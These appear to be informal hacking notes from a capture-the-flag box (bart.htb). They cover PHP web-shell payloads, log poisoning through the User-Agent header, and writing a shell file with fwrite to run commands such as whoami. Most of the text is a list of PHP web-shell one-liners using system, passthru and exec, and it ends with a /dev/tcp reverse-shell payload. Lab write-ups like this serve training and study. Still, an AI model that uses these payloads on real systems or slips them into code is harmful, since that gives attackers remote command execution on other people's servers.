php hacks

reverse shell github repository:

<?php system($ REQUEST['cmd']); ?>

It looks like it's logging everytime someone visits the log.php

if we change the useragent to malicious code, we can execute?

<?php system($ REQUEST['cmd']); ?>

successfully executed

By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything)

  • changed useragent to the php code

  • changed file name to cmd.php in GET

now we can go to http://internal-01.bart.htb/log/cmd.php?cmd=whoami to execute it

now we can do reverse shell!


test php

echo("Gorigorisensei Hacking your System.") ;

Another case:

code=fwrite(fopen('shell.php','w'),'<?php echo exec($_GET["cmd"]);?>');
Logical Flows 
Creating a file (write it) 
2. put the command in it so it will be executed when we visit /shell.php?cmd=whoami
'<?php echo exec($_GET["cmd"]);?>');
since it didn't like having the single quotation mark when I used exec($_GET['cmd'])
other php one liners 
POST didn't work since it's already creating a file for us in the first command. 

Other one liners to try:

<?php echo passthru($_GET['cmd']); ?>

<?php echo exec($_POST['cmd']); ?>

<?php system($_GET['cmd']); ?>

<?php passthru($_REQUEST['cmd']); ?>

<?php echo system("0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196"); ?>

Last updated